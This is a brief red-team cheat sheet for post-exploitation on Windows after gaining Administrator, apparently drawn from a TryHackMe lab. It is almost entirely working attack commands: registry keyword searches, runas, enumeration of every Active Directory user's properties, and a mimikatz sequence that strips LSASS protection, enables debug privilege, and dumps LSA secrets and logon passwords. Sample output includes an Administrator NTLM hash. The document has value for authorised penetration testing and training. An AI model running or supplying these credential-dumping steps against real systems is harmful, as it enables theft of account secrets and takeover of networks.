Post Exploitation
Red teaming Windows machines after gaining Administrator
Last updated
Red teaming Windows machines after gaining Administrator
Last updated
reg query HKLM /f $KEYWORD /t REG_SZ /srunas /user:$USER "cmd.exe"# All info
Get-ADUser -Filter * -Properties *
# Specific details
Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description# Start mimikatz
.\mimikatz.exe
# Disable LSASS protection
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
# Enable SeDebugPrivilege permission and check for memory access
mimikatz # privilege::debug
Privilege '20' OK
# Dump LSA
mimikatz # lsadump::lsa /patch
Domain : THM / S-1-5-21-1966530601-3185510712-10604624
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : fc9b72f354f0371219168bdb1460af32
...
# Dump cached passwords and hashes from lsass.exe
mimikatz # sekurlsa::logonpasswords
...